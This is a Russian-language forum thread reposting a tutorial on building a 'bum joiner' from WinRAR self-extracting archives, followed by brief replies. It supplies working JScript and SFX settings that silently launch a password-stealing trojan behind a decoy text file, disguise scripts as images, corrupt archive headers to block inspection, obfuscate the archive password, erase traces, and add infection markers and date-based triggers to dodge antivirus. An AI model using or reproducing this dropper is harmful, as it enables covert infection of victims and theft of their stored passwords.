-
Обратная связь: [email protected]
Наш канал в telegram: https://t.me/ru_sfera
Группа VK: https://vk.com/rusfera
Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации
ВАЖНО Делаем крутой крипто-джойнер и обходим детект VT
- Автор темы X-Shar
- Дата начала
- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Более усовершенствованный способ использования,как выразился автор статьи-"бомжеджойнера".
В этой статье мы постараемся раскрыть тему склейки с помощью подручных средств. Научимся клеить, прятать файлы, ставить хитрые условия запуска и многое другое…
1. Склеиваем.
Всем известно, что sfx-архивы можно использовать в качестве бомжеджойнера. Предлагаю базовый вариант склейки с помощью WinRar. Если изобразить схематично, то работать склейка будет следующим образом:
Начинается все с того, что юзер запускает наш sfx-архив. В настройках архива указан запуск скрипта outside.js, который в свою очередь, запускает обманку, а затем запароленный архив с определенными параметрами. В настройках архива с паролем тоже указан скрипт на запуск, только теперь inside.js. Скрипт запускает троян.
Теперь разберемся, как такое сделать.
Для начала нам нужны 4 файла:
JScript является скриптовым языком программирования, разработанным компанией Microsoft©. Хотя данный язык напоминает JavaScript, он имеет отличия, иногда очень заметные. JScript может использоваться для создания приложений, запускаемых локально, то есть с диска пользователя. При этом не требуется установки дополнительного программного обеспечения.
Содержимое файла inside.js:
Разумеется, мы можем использовать всю мощь Jscript и обфусцировать данный код до неузнаваемости, но оставим это на другой раз. Следующим шагом будет создание первого sfx-архива (на схемке – sfx_with_pass.exe):
В примере я воспользуюсь winrar’ом. Выставляем настройки:
Имя архива, сжатие, 2 галочки и жмем на “Установить пароль”:
Выбрали пароль, жмем ОК и переходим во вкладку Комментарий:
Можно вставить только это (вы же хотите просто скопировать):
Теперь создадим файл outside.js:
И наконец, создаем еще один архив:
Настраиваем как и раньше, только не ставим пароль. В комментарии пишем:
Наша бомже-склейка готова. Поздравляю! С помощью этой статьи вы уже можете клеить файлы беспалевнее, чем описано в большинстве мануалов. Никаких всплывающих черных окон от батников, а в качестве бонуса – затык (до поры до времени) сигнатурных антивирусов, которые не могут открыть запароленный архив.
2. Прячем.
Изложенного выше материала хватит чтобы получить плюсик на школо-хеккерном-андирграунт-форуме. Но мы пойдем дальше. И вы сможете даже толкать эту статью под видом охуительного мануала, рублей за 600 (как раз на грамулю гашика хватит).
Для начала откроем нашу склейку с помощью WinRar:
Палево, конечно, диавольское. Даже не одаренный божией искрой отрок поймет, что что-то сатанинское вываливается из этого бесовского архива. Перебьем расширения файлов на более добрые:
Имена файлов, для наглядности, я оставлю такими-же как и были, чтобы вы не запутались. Мы докинем в нашу папку еще один файлик – ярлык help.lnk. Создаем ярлык для любого файла, и меняем его свойства следующим образом:
Меняем рабочую папку, меням значок, ставим окно, в поле объект пишем:
Сохраняем, закрываем свойства, потом опять открываем и меняем в настройках “Расположение”:
Теперь поменяем комментарий к архиву:
SetupCode – означает, что пока help.lnk не отработает, outside.js не запустится. (Кто плотно изучал консольку, уже заметил, что можно обойтись вообще одной строчкой Setup=help.lnk, а Setup=outside.js и SetupCode выкинуть, или можно грузить злые файлы только с помощью файла .lnk).
И еще нам придется малость подредактировать файл outside.js:
Все пашет как и раньше, но теперь, если файл откроют через архиватор, наши файлы хоть и видно, но все расширения абсолютно безобидные (для большинства пользователей). Ничто не мешает закинуть еще 10-15 файлов, до кучи.
3. Прячем глубже.
В прошлом методе есть несколько проблем:
Переходим по смещению 400h (скроль мышкой от начала файла, пока не увидишь 000400). И затираем 1 байт нулями (для примера – байт по смещению 430h). То что затерли, запоминаем (в нашем случае было значение 87h).
Сохраняем, пробуем запустить – ноль реакции. Отлична. Теперь сделаем так, чтобы наш архивчик нельзя было открыть через WinRar. Ищем в файле “Rar!“:
Нашли. Теперь тоже затираем 1 байт (букву “R”). Было:
52 61 72 ….
стало:
00 61 72 …
Пробуем открыть наш файл через архиватор:
Чего и добивались.
Но подождите, как же мы запустим наш архив с убер-приватным троянингом? Пропатчим архив перед запуском (нет остановки извращеньям)! Никаких лишних файлов – все проделаем в скрипте outside.js:
Проверяем. Пашет. С одной проблемой разобрались. Но как маячит наш пароль – “ZLAYASATANAPRIDET“. Надо его как-то скрыть. Сделаем кодес сумасбродней в нашем илитарнейшем бомжеклее:
Обыкновенная обфускация, но разница на лицо.
Продолжим… Наш бомжеклей, как и полагается всякому бомжу, оставляет после себя тонны мусора. Это не дело. Надо убираться за бомжиком, если он суко мразь сам не может. Для этого добавим в файленг outside.js:
И все говнище удаляется. Остается только падлюка пинч, который по идее должен удалиться сам (либо его съест проактивка). Все что нам остается, это накрыть скрипт outside.js обфускатором и наш бомжеклей обретает приятный аромат огуречного лосьона.
4. Финальные штрихи
Нам осталось не так уж и много:
Реализуется это довольно просто:
Мы можем использовать более сложные условия – запускать троянчег до определенной даты, или после определенной даты, по определенным числам, в определенные часы и т.д. К примеру, троян сработает, если дата больше чем 2014 год, 8 месяц (август), 23 число и 12 часов.
Можно сделать несколько таких условий и запаковать 4-5 билдов с разным криптом (к примеру – 1 крипт на 2-3 дня, главное рассчитать, как быстро палится крипт). Я думаю такая техника может выручить в некоторых условиях.
Мы можем воспользоваться и немного другой техникой. К примеру добавим в пароль переменную, значение которой зависит от числа месяца. И к примеру, наш троян будет отрабатывать только 22 числа, потому что только 22 числа, будет подставляться правильный пароль для открытия sfx-архива.
Чтобы сделать Hd-иконку:
5. Заключение.
Наверное ты думаешь, что неплохо бы такую тему автоматизировать и написать соответствующую программу.
Я так не думаю. Данная статья – лишь еще один пример того, как можно соорудить самоходную конструкцию из костылей.
From krober.biz
Статья скопирована с
В этой статье мы постараемся раскрыть тему склейки с помощью подручных средств. Научимся клеить, прятать файлы, ставить хитрые условия запуска и многое другое…
1. Склеиваем.
Всем известно, что sfx-архивы можно использовать в качестве бомжеджойнера. Предлагаю базовый вариант склейки с помощью WinRar. Если изобразить схематично, то работать склейка будет следующим образом:
Начинается все с того, что юзер запускает наш sfx-архив. В настройках архива указан запуск скрипта outside.js, который в свою очередь, запускает обманку, а затем запароленный архив с определенными параметрами. В настройках архива с паролем тоже указан скрипт на запуск, только теперь inside.js. Скрипт запускает троян.
Теперь разберемся, как такое сделать.
Для начала нам нужны 4 файла:
- Троян (к примеру – адовый пинч)
- Файл-обманка (к примеру – мега-приватный мануал по бруту ВК)
- Скрипт inside.js
- Скрипт outside.js
JScript является скриптовым языком программирования, разработанным компанией Microsoft©. Хотя данный язык напоминает JavaScript, он имеет отличия, иногда очень заметные. JScript может использоваться для создания приложений, запускаемых локально, то есть с диска пользователя. При этом не требуется установки дополнительного программного обеспечения.
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Содержимое файла inside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//запускаем троян из папки Temp
wsws.Run("pinch.exe -d%temp%",0);В примере я воспользуюсь winrar’ом. Выставляем настройки:
Имя архива, сжатие, 2 галочки и жмем на “Установить пароль”:
Выбрали пароль, жмем ОК и переходим во вкладку Комментарий:
Можно вставить только это (вы же хотите просто скопировать):
Теперь создадим файл outside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//-p - пароль к созданному ранее архиву
wsws.Run("sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);Настраиваем как и раньше, только не ставим пароль. В комментарии пишем:
Код:
Path=%temp%
SavePath
Setup=outside.js
Silent=1
Overwrite=12. Прячем.
Изложенного выше материала хватит чтобы получить плюсик на школо-хеккерном-андирграунт-форуме. Но мы пойдем дальше. И вы сможете даже толкать эту статью под видом охуительного мануала, рублей за 600 (как раз на грамулю гашика хватит).
Для начала откроем нашу склейку с помощью WinRar:
Палево, конечно, диавольское. Даже не одаренный божией искрой отрок поймет, что что-то сатанинское вываливается из этого бесовского архива. Перебьем расширения файлов на более добрые:
Имена файлов, для наглядности, я оставлю такими-же как и были, чтобы вы не запутались. Мы докинем в нашу папку еще один файлик – ярлык help.lnk. Создаем ярлык для любого файла, и меняем его свойства следующим образом:
Меняем рабочую папку, меням значок, ставим окно, в поле объект пишем:
Код:
%systemroot%\System32\cmd.exe /c rename %temp%\outside.gif outside.jsТеперь поменяем комментарий к архиву:
Код:
Path=%temp%
SavePath
Setup=help.lnk
Setup=outside.js
SetupCode
Silent=1
Overwrite=1И еще нам придется малость подредактировать файл outside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//переименовываем архив перед запуском
wsws.Run("cmd.exe /c rename %temp%\\sfx_with_pass.png sfx_with_pass.exe",0);
//Запускаем через вызов cmd, чтобы скрипт не ругался на отсутствие файла.
//-p - пароль к созданному ранее архиву
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);3. Прячем глубже.
В прошлом методе есть несколько проблем:
- sfx_with_pass.exe можно открыть как архив
- Содержимое sfx_with_pass.exe можно вытащить, зная пароль.
- В папке temp остается куча мусора.
- Исходник outside.js никак не защищен
Переходим по смещению 400h (скроль мышкой от начала файла, пока не увидишь 000400). И затираем 1 байт нулями (для примера – байт по смещению 430h). То что затерли, запоминаем (в нашем случае было значение 87h).
Сохраняем, пробуем запустить – ноль реакции. Отлична. Теперь сделаем так, чтобы наш архивчик нельзя было открыть через WinRar. Ищем в файле “Rar!“:
Нашли. Теперь тоже затираем 1 байт (букву “R”). Было:
52 61 72 ….
стало:
00 61 72 …
Пробуем открыть наш файл через архиватор:
Чего и добивались.
Но подождите, как же мы запустим наш архив с убер-приватным троянингом? Пропатчим архив перед запуском (нет остановки извращеньям)! Никаких лишних файлов – все проделаем в скрипте outside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);
//файло для потчинга
var file="sfx_with_pass.png";
var inp=new ActiveXObject("ADODB.Stream");
inp.Type=1;
inp.Open();
inp.LoadFromFile(file);
var out=new ActiveXObject("ADODB.Stream");
out.Type=1;
out.Open();
//смещение первого места для потчинга
var position=0x430;
inp.CopyTo(out,position*1);
inp.Read(1);
out.Write(mb2b(eval("'"+"\x87"+"'")));
//вычисляем второе смещение
var position=0x30000-position;
inp.CopyTo(out,(position*1)-1);
inp.Read(1);
out.Write(mb2b(eval("'"+"\x52"+"'")));
inp.CopyTo(out);
//отпут схороняет все в файл
out.SaveToFile("sfx_with_pass.exe",2);
function mb2b(byte){
with(new ActiveXObject("ADODB.Recordset")){
Fields.Append("x",205,1);
Open();
AddNew();
Fields(0).AppendChunk(byte);
return Fields(0).GetChunk(1);
}
}
//-p - пароль к созданному ранее архиву
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
Код:
//будет
var _0x72c6=["\x50\x52\x49\x44\x45\x54","\x5A\x4C\x41\x59\x41","\x53\x41\x54\x41\x4E\x41","\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63\x20\x25\x74\x65\x6D\x70\x25\x5C\x73\x66\x78\x5F\x77\x69\x74\x68\x5F\x70\x61\x73\x73\x2E\x65\x78\x65\x20\x2D\x70","\x20\x2D\x64\x25\x74\x65\x6D\x70\x25"];var a=_0x72c6[0];var c=_0x72c6[1];var b=_0x72c6[2];wsws.Run(_0x72c6[3]+c+b+a+_0x72c6[4],0);
//вместо этого
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);Продолжим… Наш бомжеклей, как и полагается всякому бомжу, оставляет после себя тонны мусора. Это не дело. Надо убираться за бомжиком, если он суко мразь сам не может. Для этого добавим в файленг outside.js:
Код:
//.......
//выше все что было раньше
wsws.Run("cmd.exe /c del %temp%\\manual.txt",2);
wsws.Run("cmd.exe /c del %temp%\\help.lnk",2);
wsws.Run("cmd.exe /c del %temp%\\outside.js",2);
WScript.Sleep(3000);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.png",2);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.exe",2);
wsws.Run("cmd.exe /c del %temp%\\inside.js",2);-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
4. Финальные штрихи
Нам осталось не так уж и много:
- Условие файл (наличие, отсутствие)
- Условие время (день, месяц, час, до даты, после даты)
- Сборный пасс
- Сделать иконку (+ HD-иконки)
Реализуется это довольно просто:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//добавляем в скрипт
var fso = WScript.CreateObject("Scripting.FileSystemObject");
if (fso.FileExists("C:\\uje_zarazili_ne_trogat.txt")){
wsws.Run("notepad %temp%\\manual.txt",1);
wsws.Run("cmd.exe /c del %temp%\\manual.txt",2);
wsws.Run("cmd.exe /c del %temp%\\help.lnk",2);
wsws.Run("cmd.exe /c del %temp%\\outside.js",2);
WScript.Sleep(5000);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.png",2);
}else {
//////////////
// Остальной кодес (переименование, патчинг архива, запуск, удаление и т.д.)
//////////////
wsws.Run("notepad %temp%\\manual.txt",1);
var a = fso.CreateTextFile("C:\\uje_zarazili_ne_trogat.txt", true);
a.WriteLine("Zarazili tobi lalka!!!!11111");
a.Close();
}
Код:
/.....
time_now = new Date();
time_trigger = new Date("Sat Aug 23 2014 21:53:47 GMT+0400");
if (time_now > time_trigger){
//Запускаем троян. Либо любой другой код...
wsws.Run("pinch.exe",1);
}else {
//Запускаем мануал. Либо любой другой код...
wsws.Run("notepad %temp%\\false.txt",1);
}Мы можем воспользоваться и немного другой техникой. К примеру добавим в пароль переменную, значение которой зависит от числа месяца. И к примеру, наш троян будет отрабатывать только 22 числа, потому что только 22 числа, будет подставляться правильный пароль для открытия sfx-архива.
Чтобы сделать Hd-иконку:
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
5. Заключение.
Наверное ты думаешь, что неплохо бы такую тему автоматизировать и написать соответствующую программу.
Я так не думаю. Данная статья – лишь еще один пример того, как можно соорудить самоходную конструкцию из костылей.
From krober.biz
Статья скопирована с
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
- Регистрация
- 14.05.2014
- Сообщения
- 399
- Репутация
все это джаст фо фан и лулз. для сбития чисто сигнарутного детекта при контекстном сканировании можно так с бубном и не танцевать. а при запуске это все равно не поможет - файл будет извлечен и задетектирован.
- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Это так,но после изучения статьи,можно научиться всяким маленьким фишкам.Для общего развития полезно.
- Регистрация
- 03.06.2012
- Сообщения
- 6 202
- Репутация
Хочу сказать что такой способ используется больше для маскировки вирусов нежели для обхода детекта АВ.
Что-бы обойти АВ используют другие методы в комплексе с джойнером.
Т.е. это полезная нагрузка, например склейка с картинкой и прочее, жертва открывает картинку а вместе с ним скрыто запускается вирус, для этого и нужен такой джойнер !
Хотя многие даже и не скрывают вирус, сам много раз попадался, на "классный патч к игре" который сливает все сохраненные пароли и после этого самоудаляется !
В этоге все в ауте файл-вирус удалился и при этом всё слил, вот такие-вот дела !
Что-бы обойти АВ используют другие методы в комплексе с джойнером.
Т.е. это полезная нагрузка, например склейка с картинкой и прочее, жертва открывает картинку а вместе с ним скрыто запускается вирус, для этого и нужен такой джойнер !
Хотя многие даже и не скрывают вирус, сам много раз попадался, на "классный патч к игре" который сливает все сохраненные пароли и после этого самоудаляется !
В этоге все в ауте файл-вирус удалился и при этом всё слил, вот такие-вот дела !
